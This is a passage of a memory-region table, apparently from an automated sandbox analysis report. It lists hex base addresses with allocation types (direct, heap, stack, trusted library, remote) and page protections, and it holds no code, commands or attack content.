page execute and read and write
|
||
B789000
|
direct allocation
|
page execute and read and write
|
||
BAC4000
|
direct allocation
|
page execute and read and write
|
||
B4F0000
|
direct allocation
|
page execute and read and write
|
||
B1CF000
|
direct allocation
|
page execute and read and write
|
||
B256000
|
direct allocation
|
page execute and read and write
|
||
B65C000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BE7A000
|
direct allocation
|
page execute and read and write
|
||
239D7000
|
trusted library allocation
|
page read and write
|
||
B598000
|
direct allocation
|
page execute and read and write
|
||
615000
|
heap
|
page read and write
|
||
B8B6000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
AE91000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
70C0000
|
heap
|
page read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
3239000
|
heap
|
page read and write
|
||
2FC5000
|
trusted library allocation
|
page execute and read and write
|
||
BF7C000
|
direct allocation
|
page execute and read and write
|
||
22E19000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BFC6000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BB98000
|
direct allocation
|
page execute and read and write
|
||
BC8F000
|
direct allocation
|
page execute and read and write
|
||
B505000
|
direct allocation
|
page execute and read and write
|
||
B680000
|
direct allocation
|
page execute and read and write
|
||
7010000
|
direct allocation
|
page read and write
|
||
8694000
|
stack
|
page read and write
|
||
241A0000
|
heap
|
page execute and read and write
|
||
BB48000
|
direct allocation
|
page execute and read and write
|
||
23AD3000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
50BD000
|
stack
|
page read and write
|
||
AEED000
|
direct allocation
|
page execute and read and write
|
||
B07B000
|
direct allocation
|
page execute and read and write
|
||
ABDD000
|
direct allocation
|
page execute and read and write
|
||
B62A000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B7A0000
|
direct allocation
|
page execute and read and write
|
||
2217D000
|
trusted library allocation
|
page read and write
|
||
B9F7000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
6FA0000
|
direct allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
7880000
|
trusted library allocation
|
page read and write
|
||
2FBA000
|
trusted library allocation
|
page execute and read and write
|
||
2F00000
|
heap
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B1B8000
|
direct allocation
|
page execute and read and write
|
||
AEBD000
|
direct allocation
|
page execute and read and write
|
||
7871000
|
heap
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
B8F3000
|
direct allocation
|
page execute and read and write
|
||
B21B000
|
direct allocation
|
page execute and read and write
|
||
BA61000
|
direct allocation
|
page execute and read and write
|
||
242F7000
|
heap
|
page read and write
|
||
8927000
|
heap
|
page read and write
|
||
AFB1000
|
direct allocation
|
page execute and read and write
|
||
AF77000
|
direct allocation
|
page execute and read and write
|
||
BF19000
|
direct allocation
|
page execute and read and write
|
||
64A0000
|
direct allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B5E0000
|
direct allocation
|
page execute and read and write
|
||
BDDC000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B70F000
|
direct allocation
|
page execute and read and write
|
||
B0F2000
|
direct allocation
|
page execute and read and write
|
||
BF44000
|
direct allocation
|
page execute and read and write
|
||
B524000
|
direct allocation
|
page execute and read and write
|
||
BB37000
|
direct allocation
|
page execute and read and write
|
||
B1DF000
|
direct allocation
|
page execute and read and write
|
||
7380000
|
direct allocation
|
page read and write
|
||
8810000
|
trusted library allocation
|
page read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
AFC6000
|
direct allocation
|
page execute and read and write
|
||
A82C000
|
direct allocation
|
page execute and read and write
|
||
B270000
|
direct allocation
|
page execute and read and write
|
||
24CB0000
|
trusted library allocation
|
page read and write
|
||
34A7000
|
heap
|
page read and write
|
||
B971000
|
direct allocation
|
page execute and read and write
|
||
AF87000
|
direct allocation
|
page execute and read and write
|
||
24C90000
|
trusted library allocation
|
page read and write
|
||
BDA5000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
21EA4000
|
trusted library allocation
|
page read and write
|
||
BBEE000
|
direct allocation
|
page execute and read and write
|
||
B626000
|
direct allocation
|
page execute and read and write
|
||
24985000
|
trusted library allocation
|
page read and write
|
||
B00B000
|
direct allocation
|
page execute and read and write
|
||
B518000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
76B0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BBF6000
|
direct allocation
|
page execute and read and write
|
||
B257000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BBBD000
|
direct allocation
|
page execute and read and write
|
||
AF6C000
|
direct allocation
|
page execute and read and write
|
||
783D000
|
stack
|
page read and write
|
||
BB1B000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AD97000
|
direct allocation
|
page execute and read and write
|
||
B1B7000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B1CD000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
BB9F000
|
direct allocation
|
page execute and read and write
|
||
6FB0000
|
heap
|
page read and write
|
||
B08E000
|
direct allocation
|
page execute and read and write
|
||
AFF4000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
22E04000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
A98E000
|
direct allocation
|
page execute and read and write
|
||
B306000
|
direct allocation
|
page execute and read and write
|
||
AFE9000
|
direct allocation
|
page execute and read and write
|
||
24311000
|
heap
|
page read and write
|
||
B668000
|
direct allocation
|
page execute and read and write
|
||
BA7F000
|
direct allocation
|
page execute and read and write
|
||
AD34000
|
direct allocation
|
page execute and read and write
|
||
5EC9000
|
trusted library allocation
|
page read and write
|
||
BD09000
|
direct allocation
|
page execute and read and write
|
||
B07F000
|
direct allocation
|
page execute and read and write
|
||
BB7B000
|
direct allocation
|
page execute and read and write
|
||
2F40000
|
heap
|
page read and write
|
||
B8EB000
|
direct allocation
|
page execute and read and write
|
||
AF53000
|
direct allocation
|
page execute and read and write
|
||
BC89000
|
direct allocation
|
page execute and read and write
|
||
AF60000
|
direct allocation
|
page execute and read and write
|
||
5A5000
|
trusted library allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B65E000
|
direct allocation
|
page execute and read and write
|
||
B6DA000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
228E0000
|
trusted library allocation
|
page read and write
|
||
B16A000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AD7F000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B846000
|
direct allocation
|
page execute and read and write
|
||
B321000
|
direct allocation
|
page execute and read and write
|
||
AE98000
|
direct allocation
|
page execute and read and write
|
||
AF8E000
|
direct allocation
|
page execute and read and write
|
||
B9F9000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
242E0000
|
heap
|
page read and write
|
||
7F928000
|
trusted library allocation
|
page execute and read and write
|
||
B380000
|
direct allocation
|
page execute and read and write
|
||
AFDF000
|
direct allocation
|
page execute and read and write
|
||
21F85000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
BE25000
|
direct allocation
|
page execute and read and write
|
||
B703000
|
direct allocation
|
page execute and read and write
|
||
B30A000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
BA1F000
|
direct allocation
|
page execute and read and write
|
||
B17E000
|
direct allocation
|
page execute and read and write
|
||
BE9F000
|
direct allocation
|
page execute and read and write
|
||
22900000
|
heap
|
page read and write
|
||
B071000
|
direct allocation
|
page execute and read and write
|
||
B635000
|
direct allocation
|
page execute and read and write
|
||
AF47000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AB5F000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
A961000
|
direct allocation
|
page execute and read and write
|
||
8A4B000
|
heap
|
page read and write
|
||
BFDB000
|
direct allocation
|
page execute and read and write
|
||
B6C1000
|
direct allocation
|
page execute and read and write
|
||
A64C000
|
direct allocation
|
page execute and read and write
|
||
B20A000
|
direct allocation
|
page execute and read and write
|
||
AD2C000
|
direct allocation
|
page execute and read and write
|
||
23024000
|
trusted library allocation
|
page read and write
|
||
AC5E000
|
direct allocation
|
page execute and read and write
|
||
BDFB000
|
direct allocation
|
page execute and read and write
|
||
24EC0000
|
trusted library allocation
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
BC74000
|
direct allocation
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
239C1000
|
trusted library allocation
|
page read and write
|
||
BA15000
|
direct allocation
|
page execute and read and write
|
||
BB17000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BA2B000
|
direct allocation
|
page execute and read and write
|
||
B012000
|
direct allocation
|
page execute and read and write
|
||
8A71000
|
heap
|
page read and write
|
||
B499000
|
direct allocation
|
page execute and read and write
|
||
6D70000
|
heap
|
page read and write
|
||
B3B2000
|
direct allocation
|
page execute and read and write
|
||
BF66000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
2255D000
|
stack
|
page read and write
|
||
BD18000
|
direct allocation
|
page execute and read and write
|
||
ADA8000
|
direct allocation
|
page execute and read and write
|
||
25054000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
407000
|
unkown
|
page readonly
|
||
227C8000
|
trusted library allocation
|
page read and write
|
||
8310000
|
trusted library allocation
|
page execute and read and write
|
||
23C32000
|
trusted library allocation
|
page read and write
|
||
B43D000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B05E000
|
direct allocation
|
page execute and read and write
|
||
53CE000
|
trusted library allocation
|
page read and write
|
||
B3B6000
|
direct allocation
|
page execute and read and write
|
||
BCA7000
|
direct allocation
|
page execute and read and write
|
||
3200000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AC95000
|
direct allocation
|
page execute and read and write
|
||
BC2B000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
AF4F000
|
direct allocation
|
page execute and read and write
|
||
322B000
|
trusted library allocation
|
page execute and read and write
|
||
A861000
|
direct allocation
|
page execute and read and write
|
||
BABC000
|
direct allocation
|
page execute and read and write
|
||
A7D2000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
8470000
|
heap
|
page read and write
|
||
2F90000
|
trusted library allocation
|
page read and write
|
||
B634000
|
direct allocation
|
page execute and read and write
|
||
B894000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
22B1A000
|
trusted library allocation
|
page read and write
|
||
7899000
|
heap
|
page read and write
|
||
B0C2000
|
direct allocation
|
page execute and read and write
|
||
6636000
|
heap
|
page read and write
|
||
8AF5000
|
trusted library allocation
|
page read and write
|
||
6540000
|
direct allocation
|
page read and write
|
||
B630000
|
direct allocation
|
page execute and read and write
|
||
2FD0000
|
trusted library allocation
|
page read and write
|
||
24954000
|
trusted library allocation
|
page read and write
|
||
6F90000
|
direct allocation
|
page read and write
|
||
BCA0000
|
direct allocation
|
page execute and read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
BC5A000
|
direct allocation
|
page execute and read and write
|
||
7587000
|
trusted library allocation
|
page read and write
|
||
AD88000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B44D000
|
direct allocation
|
page execute and read and write
|
||
B132000
|
direct allocation
|
page execute and read and write
|
||
A62C000
|
direct allocation
|
page execute and read and write
|
||
B81E000
|
direct allocation
|
page execute and read and write
|
||
BD86000
|
direct allocation
|
page execute and read and write
|
||
B2A4000
|
direct allocation
|
page execute and read and write
|
||
B6AC000
|
direct allocation
|
page execute and read and write
|
||
223AD000
|
stack
|
page read and write
|
||
B9AD000
|
direct allocation
|
page execute and read and write
|
||
B573000
|
direct allocation
|
page execute and read and write
|
||
565E000
|
trusted library allocation
|
page read and write
|
||
AF25000
|
direct allocation
|
page execute and read and write
|
||
2430F000
|
heap
|
page read and write
|
||
AEAE000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B2A2000
|
direct allocation
|
page execute and read and write
|
||
70BC000
|
heap
|
page read and write
|
||
242F8000
|
heap
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B9D9000
|
direct allocation
|
page execute and read and write
|
||
B5CB000
|
direct allocation
|
page execute and read and write
|
||
ADBF000
|
direct allocation
|
page execute and read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
BEC3000
|
direct allocation
|
page execute and read and write
|
||
2251F000
|
stack
|
page read and write
|
||
2246E000
|
stack
|
page read and write
|
||
257E5000
|
trusted library allocation
|
page read and write
|
||
AF5F000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
ADCC000
|
direct allocation
|
page execute and read and write
|
||
B274000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
B332000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B8DC000
|
direct allocation
|
page execute and read and write
|
||
50C0000
|
trusted library allocation
|
page read and write
|
||
97D0000
|
direct allocation
|
page execute and read and write
|
||
256C0000
|
trusted library allocation
|
page execute and read and write
|
||
65EE000
|
heap
|
page read and write
|
||
B06B000
|
direct allocation
|
page execute and read and write
|
||
BA42000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
6850000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B9D7000
|
direct allocation
|
page execute and read and write
|
||
BCBA000
|
direct allocation
|
page execute and read and write
|
||
23090000
|
trusted library allocation
|
page read and write
|
||
6FD0000
|
direct allocation
|
page read and write
|
||
22172000
|
trusted library allocation
|
page read and write
|
||
BC38000
|
direct allocation
|
page execute and read and write
|
||
B113000
|
direct allocation
|
page execute and read and write
|
||
AC5C000
|
direct allocation
|
page execute and read and write
|
||
BFF4000
|
direct allocation
|
page execute and read and write
|
||
BA63000
|
direct allocation
|
page execute and read and write
|
||
BB19000
|
direct allocation
|
page execute and read and write
|
||
B219000
|
direct allocation
|
page execute and read and write
|
||
23F9D000
|
stack
|
page read and write
|
||
B59A000
|
direct allocation
|
page execute and read and write
|
||
B873000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24D90000
|
trusted library allocation
|
page read and write
|
||
4590000
|
remote allocation
|
page execute and read and write
|
||
B0C0000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
ACA7000
|
direct allocation
|
page execute and read and write
|
||
B4A1000
|
direct allocation
|
page execute and read and write
|
||
BC3D000
|
direct allocation
|
page execute and read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
BB15000
|
direct allocation
|
page execute and read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
BA0F000
|
direct allocation
|
page execute and read and write
|
||
B459000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
BC58000
|
direct allocation
|
page execute and read and write
|
||
B33C000
|
direct allocation
|
page execute and read and write
|
||
BAF0000
|
direct allocation
|
page execute and read and write
|
||
2FB0000
|
trusted library allocation
|
page read and write
|
||
B5F0000
|
direct allocation
|
page execute and read and write
|
||
25056000
|
trusted library allocation
|
page read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BE09000
|
direct allocation
|
page execute and read and write
|
||
B88E000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B96F000
|
direct allocation
|
page execute and read and write
|
||
AEDF000
|
direct allocation
|
page execute and read and write
|
||
B91D000
|
direct allocation
|
page execute and read and write
|
||
AD8D000
|
direct allocation
|
page execute and read and write
|
||
BBF2000
|
direct allocation
|
page execute and read and write
|
||
B3C9000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
BD09000
|
direct allocation
|
page execute and read and write
|
||
2FE3000
|
trusted library allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B85F000
|
direct allocation
|
page execute and read and write
|
||
B1E3000
|
direct allocation
|
page execute and read and write
|
||
AB3A000
|
direct allocation
|
page execute and read and write
|
||
7935000
|
heap
|
page read and write
|
||
2209B000
|
trusted library allocation
|
page read and write
|
||
B0A1000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
21EA8000
|
trusted library allocation
|
page read and write
|
||
23CA4000
|
trusted library allocation
|
page read and write
|
||
B0E2000
|
direct allocation
|
page execute and read and write
|
||
AF71000
|
direct allocation
|
page execute and read and write
|
||
7499000
|
heap
|
page read and write
|
||
ADF3000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B7C1000
|
direct allocation
|
page execute and read and write
|
||
42F000
|
unkown
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
21FA3000
|
trusted library allocation
|
page read and write
|
||
BFA2000
|
direct allocation
|
page execute and read and write
|
||
22095000
|
trusted library allocation
|
page read and write
|
||
24EC0000
|
trusted library allocation
|
page read and write
|
||
B6D5000
|
direct allocation
|
page execute and read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
25790000
|
trusted library allocation
|
page read and write
|
||
AD76000
|
direct allocation
|
page execute and read and write
|
||
BE51000
|
direct allocation
|
page execute and read and write
|
||
442000
|
unkown
|
page readonly
|
||
237F000
|
stack
|
page read and write
|
||
A68E000
|
direct allocation
|
page execute and read and write
|
||
B0A3000
|
direct allocation
|
page execute and read and write
|
||
BA30000
|
direct allocation
|
page execute and read and write
|
||
229AC000
|
trusted library allocation
|
page read and write
|
||
BA91000
|
direct allocation
|
page execute and read and write
|
||
88D0000
|
trusted library allocation
|
page execute and read and write
|
||
229CC000
|
trusted library allocation
|
page read and write
|
||
228F0000
|
trusted library allocation
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B6CD000
|
direct allocation
|
page execute and read and write
|
||
BA7C000
|
direct allocation
|
page execute and read and write
|
||
B734000
|
direct allocation
|
page execute and read and write
|
||
B10B000
|
direct allocation
|
page execute and read and write
|
||
BF53000
|
direct allocation
|
page execute and read and write
|
||
AFD2000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
B1CE000
|
direct allocation
|
page execute and read and write
|
||
B464000
|
direct allocation
|
page execute and read and write
|
||
21E98000
|
trusted library allocation
|
page read and write
|
||
BBD8000
|
direct allocation
|
page execute and read and write
|
||
3140000
|
heap
|
page read and write
|
||
B13E000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
BF42000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
AC0D000
|
direct allocation
|
page execute and read and write
|
||
AF73000
|
direct allocation
|
page execute and read and write
|
||
B2D2000
|
direct allocation
|
page execute and read and write
|
||
C00E000
|
direct allocation
|
page execute and read and write
|
||
8320000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BAD8000
|
direct allocation
|
page execute and read and write
|
||
ACED000
|
direct allocation
|
page execute and read and write
|
||
24991000
|
heap
|
page read and write
|
||
B686000
|
direct allocation
|
page execute and read and write
|
||
ADC5000
|
direct allocation
|
page execute and read and write
|
||
B7C5000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
A736000
|
direct allocation
|
page execute and read and write
|
||
24C90000
|
trusted library allocation
|
page read and write
|
||
23FA1000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
A745000
|
direct allocation
|
page execute and read and write
|
||
B9CE000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B6D6000
|
direct allocation
|
page execute and read and write
|
||
704A000
|
heap
|
page read and write
|
||
BC36000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
3423000
|
trusted library allocation
|
page execute and read and write
|
||
22B66000
|
trusted library allocation
|
page read and write
|
||
74A6000
|
heap
|
page read and write
|
||
25770000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B501000
|
direct allocation
|
page execute and read and write
|
||
AEFF000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
89A7000
|
heap
|
page read and write
|
||
ADDA000
|
direct allocation
|
page execute and read and write
|
||
BB96000
|
direct allocation
|
page execute and read and write
|
||
BA93000
|
direct allocation
|
page execute and read and write
|
||
B036000
|
direct allocation
|
page execute and read and write
|
||
BA03000
|
direct allocation
|
page execute and read and write
|
||
22DF5000
|
trusted library allocation
|
page read and write
|
||
A7BF000
|
direct allocation
|
page execute and read and write
|
||
BECD000
|
direct allocation
|
page execute and read and write
|
||
BB35000
|
direct allocation
|
page execute and read and write
|
||
B508000
|
direct allocation
|
page execute and read and write
|
||
BCA2000
|
direct allocation
|
page execute and read and write
|
||
25800000
|
trusted library allocation
|
page read and write
|
||
BBB7000
|
direct allocation
|
page execute and read and write
|
||
BA23000
|
direct allocation
|
page execute and read and write
|
||
BB3A000
|
direct allocation
|
page execute and read and write
|
||
B43F000
|
direct allocation
|
page execute and read and write
|
||
220D9000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
BA99000
|
direct allocation
|
page execute and read and write
|
||
BD97000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B587000
|
direct allocation
|
page execute and read and write
|
||
5990000
|
remote allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
AEA0000
|
direct allocation
|
page execute and read and write
|
||
B1F4000
|
direct allocation
|
page execute and read and write
|
||
A6C3000
|
direct allocation
|
page execute and read and write
|
||
BCF6000
|
direct allocation
|
page execute and read and write
|
||
86FE000
|
stack
|
page read and write
|
||
B754000
|
direct allocation
|
page execute and read and write
|
||
B030000
|
direct allocation
|
page execute and read and write
|
||
BDEE000
|
direct allocation
|
page execute and read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
BC7E000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
23099000
|
trusted library allocation
|
page read and write
|
||
8923000
|
heap
|
page read and write
|
||
596000
|
trusted library allocation
|
page execute and read and write
|
||
BB13000
|
direct allocation
|
page execute and read and write
|
||
AFD8000
|
direct allocation
|
page execute and read and write
|
||
BCC0000
|
direct allocation
|
page execute and read and write
|
||
25710000
|
trusted library allocation
|
page read and write
|
||
B555000
|
direct allocation
|
page execute and read and write
|
||
B3B4000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BA2D000
|
direct allocation
|
page execute and read and write
|
||
4C8000
|
heap
|
page read and write
|
||
B8A6000
|
direct allocation
|
page execute and read and write
|
||
AE30000
|
direct allocation
|
page execute and read and write
|
||
3D30000
|
remote allocation
|
page execute and read and write
|
||
231C1000
|
trusted library allocation
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
BD7E000
|
direct allocation
|
page execute and read and write
|
||
B311000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
3440000
|
trusted library allocation
|
page read and write
|
||
22600000
|
remote allocation
|
page read and write
|
||
25040000
|
trusted library allocation
|
page read and write
|
||
B55F000
|
direct allocation
|
page execute and read and write
|
||
BAC0000
|
direct allocation
|
page execute and read and write
|
||
B41E000
|
direct allocation
|
page execute and read and write
|
||
B61C000
|
direct allocation
|
page execute and read and write
|
||
24C70000
|
trusted library allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
AFF2000
|
direct allocation
|
page execute and read and write
|
||
B36F000
|
direct allocation
|
page execute and read and write
|
||
BA5F000
|
direct allocation
|
page execute and read and write
|
||
B6FE000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BA8B000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BCC9000
|
direct allocation
|
page execute and read and write
|
||
8C10000
|
trusted library allocation
|
page read and write
|
||
BA8F000
|
direct allocation
|
page execute and read and write
|
||
B890000
|
direct allocation
|
page execute and read and write
|
||
BC8D000
|
direct allocation
|
page execute and read and write
|
||
BFEC000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B71C000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
23B63000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
AC37000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
245AE000
|
stack
|
page read and write
|
||
AB65000
|
direct allocation
|
page execute and read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
AC09000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
ACEA000
|
direct allocation
|
page execute and read and write
|
||
BB17000
|
direct allocation
|
page execute and read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
B327000
|
direct allocation
|
page execute and read and write
|
||
2F93000
|
trusted library allocation
|
page execute and read and write
|
||
2124000
|
heap
|
page read and write
|
||
BA65000
|
direct allocation
|
page execute and read and write
|
||
BB6A000
|
direct allocation
|
page execute and read and write
|
||
B54F000
|
direct allocation
|
page execute and read and write
|
||
B4E0000
|
direct allocation
|
page execute and read and write
|
||
B3FF000
|
direct allocation
|
page execute and read and write
|
||
B5DC000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
76E0000
|
trusted library allocation
|
page read and write
|
||
792C000
|
heap
|
page read and write
|
||
BBDE000
|
direct allocation
|
page execute and read and write
|
||
AEC9000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
B00A000
|
direct allocation
|
page execute and read and write
|
||
BE0C000
|
direct allocation
|
page execute and read and write
|
||
BA59000
|
direct allocation
|
page execute and read and write
|
||
AD79000
|
direct allocation
|
page execute and read and write
|
||
7910000
|
trusted library allocation
|
page read and write
|
||
B648000
|
direct allocation
|
page execute and read and write
|
||
22BB0000
|
trusted library allocation
|
page read and write
|
||
6037000
|
trusted library allocation
|
page read and write
|
||
BA65000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B561000
|
direct allocation
|
page execute and read and write
|
||
B875000
|
direct allocation
|
page execute and read and write
|
||
B001000
|
